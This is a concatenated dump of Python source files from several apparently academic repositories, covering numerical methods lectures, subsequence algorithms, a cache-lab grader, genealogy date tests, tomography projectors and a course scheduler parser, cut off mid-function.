#### File: Flowers/models/flower_generator.py ```python import joblib import numpy as np from PIL import Image from keras.models import load_model import keras import os import hashlib print('agrg?') class FlowerGen(): def __init__(self): self.generator = load_model('./models/saved_models/DCGAN_V1.h5') self.clf = joblib.load('./models/saved_models/refiner_SVC.joblib') self.noise = np.random.normal(loc=0,scale=1,size=(1,100)) self.lasthash = None self.get_new_noise() self.gen_new_image() def get_new_noise(self): self.noise = np.random.normal(loc=0,scale=1,size=(1,100)) while self.clf.predict_proba(self.noise)[0,1] < 0.5: self.noise = np.random.normal(loc=0,scale=1,size=(1,100)) def gen_new_image(self): img = self.generator.predict(self.noise)[0] * 0.5 + 0.5 image = Image.fromarray((img*255).astype('uint8')) md5hash = hashlib.md5(image.tobytes()).hexdigest() image.save(f'./static/images/{md5hash}.png') if self.lasthash is not None: os.remove(f'./static/images/{self.lasthash}.png') else: pass self.lasthash = md5hash self.get_new_noise() return f'images/{self.lasthash}.png' if __name__ == '__main__': flowergen = FlowerGen() flowergen.gen_new_image() flowergen.gen_new_image() ```
{ "source": "josh-gree/NumericalMethods", "score": 3 }
#### File: NumericalMethods/Labs/lab1_convergence.py ```python import numpy from matplotlib import pyplot from lab1_integral_7 import integral def f_2(x): return numpy.sqrt(1.0-x**2) I_2_exact = numpy.pi/4 Nstrips_all = 2**numpy.arange(10, 20) widths = 1.0 / Nstrips_all errors = numpy.zeros_like(widths) for i, Nstrips in enumerate(Nstrips_all): I_2_approx = integral(f_2, Nstrips) errors[i] = abs(I_2_exact - I_2_approx) pyplot.loglog(widths, errors, marker='x', label = r"$I_2$") pyplot.ylabel("Error") pyplot.xlabel("Strip width") pyplot.legend(loc="upper left") pyplot.show() ``` #### File: NumericalMethods/Labs/lab1_integral_2.py ```python import lab1_integral1 def integral_4(Nstrips): """ The first integral: integrate x between 0 and 1. """ width = 1/Nstrips integral = 0 for point in range(Nstrips): height = (point / Nstrips) integral = integral + width * height return integral def integral_total(Nstrips): """ The total integral. """ return integral_4(Nstrips) + lab1_integral1.integral_1(Nstrips) print("Total using one hundred strips:", integral_total(100)) ``` #### File: NumericalMethods/Labs/lab1_integral4.py ```python def f_x_squared(x): """ Square the input """ return x**2 def integral_2(f, Nstrips): """ The general integral: f(x) between 0 and 1. """ width = 1/Nstrips integral = 0 for point in range(Nstrips): location = point / Nstrips height = f(location) integral = integral + width * height return integral ``` #### File: tex/codes/bisection.py ```python import numpy def bisection(f, interval, eps_abs = 1e-10, max_step = 100): """ Use bisection to find x such that f(x) = 0. """ x_lo, x_hi = interval x = (x_lo + x_hi) / 2.0 f_lo = f(x_lo) if (abs(f_lo) < eps_abs): return x_lo f_hi = f(x_hi) if (abs(f_hi) < eps_abs): return x_hi #assert(f_lo*f_hi < 0), "f(Endpoints) must change sign!" if f_lo*f_hi > 0: print("Warning! f(endpoints) have same sign!") f_mid = f(x) step = 0 while (step < max_step) and abs(f_mid) > eps_abs: step += 1 if f_lo * f_mid < 0.0: x_hi = x f_hi = f(x_hi) else: x_lo = x f_lo = f(x_lo) x = (x_lo + x_hi) / 2.0 f_mid = f(x) return x if __name__ == "__main__": def f(x): return numpy.exp(x) + x - 2 def g(x): return numpy.sin(x**2) - 0.1 * x interval = [0, 1] s = bisection(f, interval) print("s = {}, f(s) = {}".format(s, f(s))) for lower in range(1,9): interval = [lower, 10] try: s = bisection(g, interval) print("interval = [{}, 10], s = {}, g(s) = {}".format(lower, s, g(s))) except: pass ``` #### File: tex/codes/lecture14.py ```python import numpy from matplotlib import pyplot def forward_difference(f, x0, h): return (f(x0+h) - f(x0)) / h def backward_difference(f, x0, h): return (f(x0) - f(x0-h)) / h def central_difference(f, x0, h): return (f(x0+h) - f(x0-h)) / (2*h) def euler(f, x_end, y0, N): x, dx = numpy.linspace(0, x_end, N+1, retstep=True) y = numpy.zeros((len(y0),N+1)) y[:,0] = y0 for n in range(N): y[:,n+1] = y[:,n] + dx * f(x[n], y[:,n]) return x, dx, y if __name__=="__main__": h = 0.5 print("Forward difference, h=",h, "y'=", forward_difference(numpy.exp, 0, h)) print("Backward difference, h=",h, "y'=", backward_difference(numpy.exp, 0, h)) print("Central difference, h=",h, "y'=", central_difference(numpy.exp, 0, h)) h = 0.05 print("Forward difference, h=",h, "y'=", forward_difference(numpy.exp, 0, h)) print("Backward difference, h=",h, "y'=", backward_difference(numpy.exp, 0, h)) print("Central difference, h=",h, "y'=", central_difference(numpy.exp, 0, h)) h_all = 0.5/2**numpy.arange(1,10) errors_forward = numpy.zeros_like(h_all) errors_backward = numpy.zeros_like(h_all) errors_central = numpy.zeros_like(h_all) for i, h in enumerate(h_all): errors_forward[i] = abs(1 - forward_difference(numpy.exp, 0, h)) errors_backward[i] = abs(1 - backward_difference(numpy.exp, 0, h)) errors_central[i] = abs(1 - central_difference(numpy.exp, 0, h)) pyplot.figure(figsize=(12,6)) pyplot.loglog(h_all, errors_forward, 'kx', label="Forward") pyplot.loglog(h_all, errors_backward, 'bo', label="Backward") pyplot.loglog(h_all, errors_central, 'r^', label="Central") pyplot.loglog(h_all, h_all/h_all[0]*errors_forward[0], 'b-', label=r"$\propto h$") pyplot.loglog(h_all, (h_all/h_all[0])**2*errors_central[0], 'g-', label=r"$\propto h^2$") pyplot.xlabel(r"$h$") pyplot.ylabel("Error") pyplot.legend(loc="upper left") pyplot.show() def f_sin(x, y): return -numpy.sin(x) print("Euler's Method") x, dx, y = euler(f_sin, 0.5, [1], 5) print("dx=", dx, "y(0.5)=", y[0,-1]) x, dx, y = euler(f_sin, 0.5, [1], 50) print("dx=", dx, "y(0.5)=", y[0,-1]) Npoints = 5*2**numpy.arange(1,10) dx_all = 0.5/Npoints errors = numpy.zeros_like(dx_all) for i, N in enumerate(Npoints): x, dx, y = euler(f_sin, 0.5, [1], N) errors[i] = abs(y[0,-1] - numpy.cos(0.5)) dx_all[i] = dx pyplot.figure(figsize=(12,6)) pyplot.loglog(dx_all, errors, 'kx') pyplot.loglog(dx_all, errors[0]*(dx_all/dx_all[0])**1, 'b-', label=r"$\propto \Delta x$") pyplot.legend(loc='upper left') pyplot.xlabel(r"$\Delta x$") pyplot.ylabel("Error") pyplot.show() def f_circle(x, y): dydx = numpy.zeros_like(y) dydx[0] = -y[1] dydx[1] = y[0] return dydx y0 = numpy.array([1, 0]) x, dx, y = euler(f_circle, 50, y0, 500) pyplot.figure(figsize=(8,8)) pyplot.plot(y[0,:], y[1,:]) pyplot.show() x, dx, y = euler(f_circle, 50, y0, 5000) pyplot.figure(figsize=(8,8)) pyplot.plot(y[0,:], y[1,:]) pyplot.show() ``` #### File: tex/codes/lecture18.py ```python import numpy from matplotlib import pyplot def euler_pc(f, x_end, y0, N): x, dx = numpy.linspace(0, x_end, N+1, retstep=True) y = numpy.zeros((len(y0),N+1)) y[:,0] = y0 for n in range(N): fn = f(x[n], y[:,n]) yp = y[:,n] + dx * fn y[:,n+1] = y[:,n] + dx / 2 * (fn + f(x[n+1], yp)) return x, dx, y def ab2(f, x_end, y0, N): x, dx = numpy.linspace(0, x_end, N+1, retstep=True) y = numpy.zeros((len(y0),N+1)) fn = numpy.zeros((len(y0),N+1)) y[:,0] = y0 fn[:,0] = f(x[0], y[:,0]) x_epc, dx_epc, y_epc = euler_pc(f, dx, y0, 1) y[:,1] = y_epc[:,1] for n in range(1,N): fn[:,n] = f(x[n], y[:,n]) y[:,n+1] = y[:,n] + dx * (3 * fn[:,n] - fn[:,n-1]) / 2 return x, dx, y def milne(f, x_end, y0, N): x, dx = numpy.linspace(0, x_end, N+1, retstep=True) y = numpy.zeros((len(y0),N+1)) fn = numpy.zeros((len(y0),N+1)) y[:,0] = y0 fn[:,0] = f(x[0], y[:,0]) x_epc, dx_epc, y_epc = euler_pc(f, dx, y0, 1) y[:,1] = y_epc[:,1] for n in range(1,N): fn[:,n] = f(x[n], y[:,n]) yp = y[:,n] + dx * (3 * fn[:,n] - fn[:,n-1]) / 2 #AB2 predictor fp = f(x[n+1], yp) y[:,n+1] = y[:,n-1] + dx * (fp + 4 * fn[:,n] + fn[:,n-1]) / 3 return x, dx, y if __name__=="__main__": def f_exp(x, y): return -y x, dx, y_ab2 = ab2(f_exp, 30, [1], 3000) pyplot.figure(figsize=(12,6)) pyplot.plot(x, y_ab2[0,:]) pyplot.ylim(-1.1,1.1) pyplot.xlabel(r"$x$") pyplot.ylabel("<NAME>") pyplot.show() x, dx, y_milne = milne(f_exp, 30, [1], 3000) pyplot.figure(figsize=(12,6)) pyplot.plot(x, y_milne[0,:]) pyplot.ylim(-1.1,1.1) pyplot.xlabel(r"$x$") pyplot.ylabel("Milne") pyplot.show() ``` #### File: tex/codes/lecture20.py ```python import numpy import matplotlib from matplotlib import pyplot from scipy.optimize import fsolve matplotlib.rcParams.update({'font.size':18, 'figure.figsize':(10,6)}) def relax_dirichlet(p, q, f, interval, bcs, N): x, dx = numpy.linspace(interval[0], interval[1], N+2, retstep=True) x_interior = x[1:-1] A = numpy.zeros((N,N)) F = numpy.zeros((N,)) y = numpy.zeros((N+2,)) for i in range(N): A[i,i] = dx**2 * q(x_interior[i]) - 2 if i>0: A[i,i-1] = 1 - dx/2 * p(x_interior[i]) if i<N-1: A[i,i+1] = 1 + dx/2 * p(x_interior[i]) F[i] = dx**2 * f(x_interior[i]) F[0] = F[0] - bcs[0] * (1 - dx/2 * p(x_interior[0])) F[-1] = F[-1] - bcs[-1] * (1 + dx/2 * p(x_interior[-1])) y_interior = numpy.linalg.solve(A, F) y[0] = bcs[0] y[1:-1] = y_interior y[-1] = bcs[-1] return x, y def relax_blackbox(f, bcs, N): x, dx = numpy.linspace(0, 1, N+2, retstep=True) def residual(y): y[0] = bcs[0] y[-1] = bcs[-1] dy = (y[2:] - y[:-2]) / (2*dx) res = numpy.zeros_like(y) res[1:-1] = y[:-2] + y[2:] - 2*y[1:-1] - dx**2 * f(x[1:-1], y[1:-1], dy) return res y_initial = numpy.zeros_like(x) y = fsolve(residual, y_initial) return x, y def relax_newton(f, dfdy, dfddy, bcs, N): x, dx = numpy.linspace(0, 1, N+2, retstep=True) y = numpy.zeros_like(x) y_old = numpy.ones_like(x) step = 0 while numpy.linalg.norm(y-y_old) > 1e-10 and step < 100: y_old = y.copy() step = step + 1 y[0] = bcs[0] y[-1] = bcs[-1] x_interior = x[1:-1] y_interior = y[1:-1] dy = (y[2:] - y[:-2]) / (2*dx) residual = y[:-2] + y[2:] - 2*y[1:-1] - dx**2 * f(x[1:-1], y[1:-1], dy) J = numpy.zeros((N,N)) for i in range(N): J[i,i] = -2 - dx**2*dfdy(x_interior[i], y_interior[i], dy[i]) if i>0: J[i,i-1] = 1 + dx/2*dfddy(x_interior[i], y_interior[i], dy[i]) if i<N-1: J[i,i+1] = 1 - dx/2*dfddy(x_interior[i], y_interior[i], dy[i]) y_new_interior = y_interior + numpy.linalg.solve(J, -residual) y[1:-1] = y_new_interior return x, y if __name__=="__main__": def p(x): return numpy.ones_like(x) def q(x): return numpy.zeros_like(x) def f(x): return -numpy.ones_like(x) x_exact = numpy.linspace(0, 1, 1000) x, y = relax_dirichlet(p, q, f, [0, 1], [0, 1], 5) pyplot.plot(x, y, 'kx', mew=2) pyplot.plot(x_exact, 2*numpy.exp(1)/(numpy.exp(1)-1)*(1-numpy.exp(-x_exact))-x_exact) pyplot.xlabel(r"$x$") pyplot.show() pyplot.plot(x, y-(2*numpy.exp(1)/(numpy.exp(1)-1)*(1-numpy.exp(-x))-x)) pyplot.xlabel(r"$x$") pyplot.show() def f_nonlinear(x, y, dy): return -1/(1+y**2) def dfdy_nonlinear(x, y, dy): return 2*y/(1+y**2)**2 def dfddy_nonlinear(x, y, dy): return numpy.zeros_like(x) x, y = relax_blackbox(f_nonlinear, [0, 0], 50) pyplot.plot(x, y, 'k--') pyplot.show() x, y = relax_newton(f_nonlinear, dfdy_nonlinear, dfddy_nonlinear, [0, 0], 50) pyplot.plot(x, y, 'k--') pyplot.show() ``` #### File: tex/codes/lecture4.py ```python import numpy def lu(A): n = len(A) L = numpy.zeros_like(A) U = numpy.zeros_like(A) for k in range(n): L[k, k] = 1.0 U[k, k] = (A[k, k] - numpy.dot(L[k, :], U[:, k])) / L[k, k] for row in range(k+1, n): L[row, k] = (A[row,k] - numpy.dot(L[row,:],U[:,k])) / U[k, k] for col in range(k+1, n): U[k, col] = (A[k,col] - numpy.dot(L[k,:],U[:,col])) / L[k, k] return L, U if __name__=="__main__": A = numpy.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0], [7.0, 8.0, 0.0]]) b = numpy.array([[1.0], [2.0], [3.0]]) L, U = lu(A) print(A) print(L) print(U) print(numpy.dot(L, U)) # Compare this against the result on the slides A = numpy.array([[2.0, 1.0,-1.0], [4.0, 1.0, 0.0], [-2.0,-3.0,8.0]]) print(A) L, U = lu(A) print(L) print(U) print(numpy.dot(L, U)) ``` #### File: tex/codes/lecture6.py ```python import numpy from matplotlib import pyplot def bisection(f, interval, max_steps=100, tol=1e-10): x_lo, x_hi = interval x = (x_lo + x_hi)/2 f_lo = f(x_lo) f_hi = f(x_hi) fx = f(x) steps = 0 while steps < max_steps and abs(fx) > tol and (x_hi - x_lo) > tol: steps = steps + 1 if fx*f_hi < 0: # Root lies in right-hand half x_lo = x f_lo = fx else: # Root lies in left-hand half x_hi = x f_hi = fx x = (x_lo + x_hi) / 2 fx = f(x) print("Nsteps", steps) return x if __name__=="__main__": def f(x): return numpy.exp(x) + x - 2 def g(x): return numpy.sin(x**2) - 0.1*x interval = [0,1] s = bisection(f, interval) print("s = ", s, "f(s) = ", f(s)) x = numpy.linspace(0, 10, 1000) pyplot.plot(x, g(x)) pyplot.show() s = bisection(g, [1,10]) print("s = ", s, "g(s) = ", g(s)) s = bisection(g, [1,9]) print("s = ", s, "g(s) = ", g(s)) s = bisection(g, [1,8.5]) print("s = ", s, "g(s) = ", g(s)) s = bisection(g, [1,8]) print("s = ", s, "g(s) = ", g(s)) ``` #### File: tex/codes/lecture8.py ```python import numpy def functional_iteration(f, x0, max_steps=100, tol=1e-10): x = numpy.zeros(max_steps+1) x[0] = x0 step = 0 g = lambda x : x - f(x) while abs(f(x[step])) > tol and step < max_steps: step = step + 1 x[step] = g(x[step-1]) return x[:step+1] def chord(f, x0, m, max_steps=100, tol=1e-10): x = numpy.zeros(max_steps+1) x[0] = x0 step = 0 g = lambda x : x - m * f(x) while abs(f(x[step])) > tol and step < max_steps: step = step + 1 x[step] = g(x[step-1]) return x[:step+1] def newton(f, df, x0, max_steps=100, tol=1e-10): x = numpy.zeros(max_steps+1) x[0] = x0 step = 0 g = lambda x : x - f(x) / df(x) while abs(f(x[step])) > tol and step < max_steps: step = step + 1 x[step] = g(x[step-1]) return x[:step+1] def secant(f, x0, x1, max_steps=100, tol=1e-10): x = numpy.zeros(max_steps+1) x[0] = x0 x[1] = x1 step = 1 while abs(f(x[step])) > tol and step < max_steps: step = step + 1 x[step] = x[step-1] - f(x[step-1]) * (x[step-1] - x[step-2]) / \ (f(x[step-1]) - f(x[step-2])) return x[:step+1] if __name__=="__main__": def f(x): return x - numpy.cos(x) def df(x): return 1 + numpy.sin(x) x_func_iteration = functional_iteration(f, 0) print("Functional iteration") print("s={}, f(s)={}, in {} steps".format(x_func_iteration[-1], f(x_func_iteration[-1]), len(x_func_iteration))) x_chord = chord(f, 0, 1.08) print("Chord, m=1.08") print("s={}, f(s)={}, in {} steps".format(x_chord[-1], f(x_chord[-1]), len(x_chord))) x_chord = chord(f, 0, 0.8) print("Chord, m=0.8") print("s={}, f(s)={}, in {} steps".format(x_chord[-1], f(x_chord[-1]), len(x_chord))) x_newton = newton(f, df, 0) print("Newton") print("s={}, f(s)={}, in {} steps".format(x_newton[-1], f(x_newton[-1]), len(x_newton))) x_secant = secant(f, 0, 1) print("Secant") print("s={}, f(s)={}, in {} steps".format(x_secant[-1], f(x_secant[-1]), len(x_secant))) ``` #### File: NumericalMethods/Worksheets/Worksheet1_Answers.py ```python def MatrixConditionCheck(A): import numpy as np MaxConditionNumber = 10 # This is absurdly low ConditionNumber = np.linalg.cond(A) if ConditionNumber > MaxConditionNumber: print "Condition number of matrix\n", A, "\ntoo large (bigger than", MaxConditionNumber, ").\n" import numpy as np print "\nQuestion 1\n" A1 = np.array([[1,2],[3,4]]) A1T = np.transpose(A1) A1I = np.linalg.inv(A1) print "The matrix\n", A1, "\nhas transpose\n", A1T, "\nand inverse\n", A1I A2 = np.array([[-3,2],[3,6]]) A2T = np.transpose(A2) A2I = np.linalg.inv(A2) print "The matrix\n", A2, "\nhas transpose\n", A2T, "\nand inverse\n", A2I print "\nQuestion 2\n" v1 = np.array([1,3,-1]) v2 = np.array([1,-2]) v3 = np.array([1,6,-3,1]) print "The vector\n", v1, "\nhas norms", np.linalg.norm(v1,1), np.linalg.norm(v1,2), np.linalg.norm(v1,np.inf) print "The vector\n", v2, "\nhas norms", np.linalg.norm(v2,1), np.linalg.norm(v2,2), np.linalg.norm(v2,np.inf) print "The vector\n", v3, "\nhas norms", np.linalg.norm(v3,1), np.linalg.norm(v3,2), np.linalg.norm(v3,np.inf) print "The matrix\n", A1, "\nhas norms", np.linalg.norm(A1,1), np.linalg.norm(A1,np.inf) print "The matrix\n", A2, "\nhas norms", np.linalg.norm(A2,1), np.linalg.norm(A2,np.inf) print "\nQuestion 3\n" MatrixConditionCheck(A1) MatrixConditionCheck(A2) print "\nQuestion 4\n" # Bisection algorithm tolerance = 1e-15 # Define the function f = lambda x: np.tan(x) - np.exp(-x) # Define the interval x_min = 0.0 x_max = 1.0 # Values at the ends of the domain f_min = f(x_min) f_max = f(x_max) assert(f_min * f_max < 0.0) # The loop x_c = (x_min + x_max) / 2.0 f_c = f(x_c) iteration = 0 while ((x_max - x_min > tolerance) and (np.abs(f_c) > tolerance) and (iteration < 100)): iteration = iteration+1 if f_min * f_c < 0.0: x_max = x_c f_max = f_c else: x_min = x_c f_min = f_c x_c = (x_min + x_max) / 2.0 f_c = f(x_c) # print "Iteration ", iteration, " x ", x_c, " f ", f_c print "The root is approximately ", x_c, " where f is ", f_c ```
{ "source": "josh-gree/poly2poly", "score": 2 }
#### File: src/data/projections.py ```python from numpy import pi, exp ,log, vstack, newaxis, array import odl def prj_factory(Nx,Ny,Np,Nd,ret_A=False): ''' returns cuda fwd and bwd projectors for given 2d geometry. Inputs Nx,Ny -> voxels in x and y dims Np -> number of angles Nd -> number of det elements Outputs fwd -> forward projector, calculates Ax Input Nx*Ny matrix Output Np*Nd matrix bwd -> backward projector, calculates A^Tx Input Nx*Ny matrix Output Np*Nd matrix ''' reco_space = odl.uniform_discr([0, 0],[1, 1], [Nx, Ny],dtype='float32') angle_partition = odl.uniform_partition(0, 2 * pi, Np) detector_partition = odl.uniform_partition(-0.1, 1.1, Nd) geometry = odl.tomo.Parallel2dGeometry(angle_partition, detector_partition) ray_trafo = odl.tomo.RayTransform(reco_space, geometry, impl='astra_cuda') fwd = lambda X : ray_trafo(X).asarray() bwd = lambda X : ray_trafo.adjoint(X).asarray() return fwd, bwd def multi_mono_prj(fwd_bwd,X): ''' monoprojection for each energy, calculates AX or A^TX Inputs fwd_bwd -> fwd or bwd projection operator should be viable for shape of x This will come from prj_factory x -> poly energy image (Ne x Nx x Ny) Outputs out -> basicly this is AX or A^TX ''' if len(X.shape) == 2: out = fwd_bwd(X) return out Ne = X.shape[0] out = vstack([fwd_bwd(X[i,...])[newaxis,...] for i in range(Ne)]) return out def poly_projection(fwd,X,I): ''' calculates -log(ZI), where Z = exp(-AX) ''' if not I.shape: I = array([I]) Z = exp(-multi_mono_prj(fwd,X))/I.sum() out = -log((Z*I[:,newaxis,newaxis]).sum(axis=0)) return out ```
{ "source": "joshgrib/2017S-coursework", "score": 4 }
#### File: cs370a/20170306/subStr.py ```python def LCS(s1, s2): if len(s1) is 0 or len(s2) is 0: return 0 if s1[0] == s2[0]: return 1 + LCS(s1[1:], s2[1:]) return max(LCS(s1, s2[1:]), LCS(s1[1:], s2)) #print LCS("hello", "world") #print LCS("", "world") #print LCS("hello", "") #print LCS("abdez", "bed") def fast_LCS(s1, s2): def fast_LCS_helper(s1, s2, memo): if (s1, s2) in memo: return memo[(s1, s2)] if len(s1) is 0 or len(s2) is 0: result = 0 elif s1[0] == s2[0]: result = 1 + fast_LCS_helper(s1[1:], s2[1:], memo) else: result = max(fast_LCS_helper(s1, s2[1:], memo), fast_LCS_helper(s1[1:], s2, memo)) memo[(s1, s2)] = result return result return fast_LCS_helper(s1, s2, {}) #print fast_LCS("hello", "world") #print fast_LCS("", "world") #print fast_LCS("hello", "") #print fast_LCS("abdez", "bed") #print fast_LCS("abdezafsdnklafsdf", "bedsadfsfapfda") def LCS_with_values(s1, s2): if len(s1) is 0 or len(s2) is 0: return (0, '') if s1[0] == s2[0]: result = LCS_with_values(s1[1:], s2[1:]) return (1+result[0], s1[0]+result[1]) use_s1 = LCS_with_values(s1[1:], s2) use_s2 = LCS_with_values(s1, s2[1:]) if use_s1[0]>use_s2[0]: return use_s1 return use_s2 #print LCS_with_values("hello", "world") #print LCS_with_values("", "world") #print LCS_with_values("hello", "") #print LCS_with_values("abdez", "bed") """CHALLENGE Instead of longest COMMON subsequence, get the longest INCREASING subsequence Strinctly increasing - no duplicates """ def LIS_LCS_helper(s1, s1sorted): if len(s1) is 0: return 0 if s1[0] == s2[0]: return 1 + LCS(s1[1:], s2[1:]) return LCS(s1[1:], s2[1:]) def LIS(s1): return LCS(s1, sorted(s1)) #count = int(input()) #inp = [0] * count #for i in range(count): # inp[i] = int(input()) #print LIS2(inp) print LIS("abcdfyzaldhs") print LIS([15, 27, 14, 38, 26, 55, 46, 65, 85]) print LIS([2, 7, 4, 3, 8]) arr = [1, 2, 6, 3, 14, 7, 10, 9, 0, 12] def LIS2(arr): dp = [1] * len(arr) index = 1 while (index < len(arr)): subindex = index - 1 while (subindex >= 0): if arr[index] > arr[subindex]: dp[index] = max(dp[index], 1 + dp[subindex]) subindex -= 1 index += 1 return dp[len(arr) - 1] print LIS2("abcdfyzaldhs") print LIS2([15, 27, 14, 38, 26, 55, 46, 65, 85]) print LIS2([2, 7, 4, 3, 8]) ``` #### File: cs370a/20170320/increasing_subsequence.py ```python exInLen = 5 exIn = [2, 7, 4, 3, 8] exOut = 3 def LIS(arr): ''' An O(n^2) solution ''' n = len(arr) lis = [1]*n for i in range (1 , n): for j in range(0 , i): if arr[i] > arr[j] and lis[i]< lis[j] + 1 : lis[i] = lis[j]+1 maxLen = 0 for i in range(n): maxLen = max(maxLen , lis[i]) return maxLen ''' THE ALGORITHM for O(nlogn) 1. If A[i] is smallest among all end candidates of active lists, we will start new active list of length 1. 2. If A[i] is largest among all end candidates of active lists, we will clone the largest active list, and extend it by A[i]. 3. If A[i] is in between, we will find a list with largest end element that is smaller than A[i]. Clone and extend this list by A[i]. We will discard all other lists of same length as that of this modified list. ''' exIn = [2, 7, 4, 3, 8] def LIS_fast(arr): listTracker = [[arr[0]]] for i in range(1, len(arr)): smallest = True largest = True largestList = listTracker[0] for subLst in listTracker: if subLst[-1] < arr[i]: smallest = False if subLst[-1] > arr[i]: largest = False if len(subLst) > len(largestList): largestList = subLst if smallest: listTracker.append([arr[i]]) elif largest: newLst = largestList.append(arr[i]) else: maxEndElemLst = listTracker[0] for subLst in listTracker: if subLst[-1] < arr[i]: if len(subLst) > len(maxEndElemLst): maxEndElemLst = subLst newLst = maxEndElemLst.append(arr[i]) listTracker = listTracker.filter((lambda x: len(x) != len(newLst)), listTracker) listTracker.append(newLst) maxLenLst = listTracker[0] for lst in listTracker: if len(lst) > len(maxLenLst): maxLenLst = lst return len(maxLenLst) print LIS_fast(exIn) inputLength = input() inArr = [] for i in range(0, inputLength): thisNum = input() inArr.append(thisNum) print LIS(inArr) ``` #### File: assignments/03-cachelab/driver.py ```python import subprocess; import re; import os; import sys; import optparse; # # computeMissScore - compute the score depending on the number of # cache misses # def computeMissScore(miss, lower, upper, full_score): if miss <= lower: return full_score if miss >= upper: return 0 score = (miss - lower) * 1.0 range = (upper- lower) * 1.0 return round((1 - score / range) * full_score, 1) # # main - Main function # def main(): # Configure maxscores here maxscore= {}; maxscore['csim'] = 27 # Parse the command line arguments p = optparse.OptionParser() p.add_option("-A", action="store_true", dest="autograde", help="emit autoresult string for Autolab"); opts, args = p.parse_args() autograde = opts.autograde # Check the correctness of the cache simulator print "Part A: Testing cache simulator" print "Running ./test-csim" p = subprocess.Popen("./test-csim", shell=True, stdout=subprocess.PIPE) stdout_data = p.communicate()[0] # Emit the output from test-csim stdout_data = re.split('\n', stdout_data) for line in stdout_data: if re.match("TEST_CSIM_RESULTS", line): resultsim = re.findall(r'(\d+)', line) else: print "%s" % (line) # Compute the scores for each step csim_cscore = map(int, resultsim[0:1]) total_score = csim_cscore[0] print "%22s%8.1f%10d" % ("Total points", total_score, maxscore['csim']) # Emit autoresult string for Autolab if called with -A option if autograde: autoresult="%.1f" % (total_score) print "\nAUTORESULT_STRING=%s" % autoresult # execute main only if called as a script if __name__ == "__main__": main() ``` #### File: assignments/hw04/tests.py ```python import unittest from main import * class UserStory04Tests(unittest.TestCase): def test1(self): #no marriage or divorce is fine self.assertTrue(marriage_before_divorce({},{})) def test2(self): #marriage without divorce is fine m = {"year":2000, "month":01, "day":01} self.assertTrue(marriage_before_divorce(m,{})) def test3(self): #divorce without marriage is NOT fine d = {"year":2000, "month":01, "day":01} self.assertFalse(marriage_before_divorce({},d)) def test4(self): #both events, with marriage first is fine m = {"year":2000, "month":01, "day":01} d = {"year":2010, "month":01, "day":01} self.assertTrue(marriage_before_divorce(m,d)) def test5(self): #both events, with divorce first is NOT fine d = {"year":2000, "month":01, "day":01} m = {"year":2010, "month":01, "day":01} self.assertFalse(marriage_before_divorce(m,d)) class UserStory05Tests(unittest.TestCase): def test1(self): #no marriage or death is fine self.assertTrue(marriage_before_death({},{})) def test2(self): #marriage without death is fine m = {"year":2000, "month":01, "day":01} self.assertTrue(marriage_before_death(m,{})) def test3(self): #death without marriage is fine d = {"year":2000, "month":01, "day":01} self.assertTrue(marriage_before_death({},d)) def test4(self): #both events, with marriage first is fine m = {"year":2000, "month":01, "day":01} d = {"year":2010, "month":01, "day":01} self.assertTrue(marriage_before_death(m,d)) def test5(self): #both events, with death first is NOT fine d = {"year":2000, "month":01, "day":01} m = {"year":2010, "month":01, "day":01} self.assertFalse(marriage_before_death(m,d)) if __name__ == '__main__': unittest.main() ```
{ "source": "joshgrib/sitstuff", "score": 3 }
#### File: src/models/scheduler.py ```python import urllib import os import xml.etree.ElementTree as etree import re import itertools def get_sem_list(): import requests import re url = 'http://web.stevens.edu/scheduler/core/' order = {'W':0, 'S':1, 'A':2, 'B':3, 'F':4}#custom alphabetic order r = requests.get(url) myre = re.compile(r'[0-9]{4}[A-Z]')#get things like '####A' re_list = myre.findall(r.text) sem_list = sorted( list(set(re_list)), #gets only unique values #sort by year then term in custom alphabetic order key=lambda semester: (semester[:4], order.get(semester[-1])), reverse=True)#most recent first return sem_list SEMESTER = get_sem_list()[0] def cleanupCourses(this_root, this_course_list): # called from schedule() """Given the root of the xml tree and the course list, this will go through the XML and remove any course not in the list from the tree, then returns the revised root""" for course in this_root.findall('Course'): name = course.get('Section') while re.match("([A-Za-z-])", name[-1]) or re.match("([A-Za-z-])", name[-2]): name = name[:(len(name) - 1)] if name not in this_course_list: this_root.remove(course) return this_root def cleanupElements(this_root): # called from schedule() """Given the root of the xml tree, this goes through the courses and removes any elements that don't have info about meeting times, then returns the revised root""" for course in this_root.findall('Course'): for element in course: if element.tag == 'Meeting': pass else: course.remove(element) return this_root def fixSpacing(this_root): # called from schedule() """Given the root of the xml tree, this will go through and fix the spacing between the letters and numbers so it can be compared better later on, then returns the revised root""" for course in this_root: attribs = course.attrib section = attribs['Section'] index_count = 0 new_section = "" for letter in section: if letter == " ": letter = (4 - index_count) * " " new_section = new_section + letter index_count += 1 attribs['Section'] = new_section return this_root def fixTime(time): # called from schedule() """Given a time from the "StartTime" or "EndTime" attribute in the xml tree, this will change teh format to HHMM and return the revised time. This also corrects a 4 hour offset present in the time formats""" time = time[:(len(time) - 4)] if len(time) == 4: # add a 0 to the front of early times time = '0' + time time = time[:2] + time[3:] # remove the colon hours = int(time[:2]) + 4 # correct 4 hour offset hours = str(hours) if len(hours) == 1: # add the 0 in fron of early times if it needs it now hours = "0" + hours time = hours + time[2:] return time def fixTimeFormat(this_root): # called from schedule() """Given the root of the xml tree, this will go through and fix the time formatting, making it standard 24hr as 4 digits in the form of HHMM, then returns the revised root""" for course in this_root: for meeting in course: attribs = meeting.attrib try: start_time = attribs['StartTime'] # get values end_time = attribs['EndTime'] start_time = fixTime(start_time) # fix values end_time = fixTime(end_time) attribs['StartTime'] = start_time # reassign attribs['EndTime'] = end_time except KeyError: # somehow something that wasn't a meeting slipped through course.remove(meeting) return this_root def getCallNums(this_root): # called from schedule() """Given the root of the xml tree, this will parse the xml and return a dictionary of course sections and call numbers""" call_numbers = {} for course in this_root: section_name = course.attrib['Section'] call_num = int(course.attrib['CallNumber']) call_numbers[section_name] = call_num return call_numbers def getBigDict(this_root): # called from schedule() """Given the root of the xml tree, this will parse the xml and return a nested dictionary of courses, sections, and meeting times""" big_dict = {} prev_course = "" for course in this_root: # add classes and section lists attribs = course.attrib this_course = attribs['Section'] if len(this_course) == 9: # recitation course course_big = this_course[:8] course_section = this_course[8:] if course_big == prev_course[:8]: # same course # add the new section with a list big_dict[course_big][course_section] = [] else: # new course big_dict[course_big] = {} # add the new class # add the new section with a list big_dict[course_big][course_section] = [] else: # normal course(lecture) course_big = this_course[:7] course_section = this_course[7:] if this_course[:7] == prev_course[:7]: # same course # add the new section with a list big_dict[course_big][course_section] = [] else: # new course big_dict[course_big] = 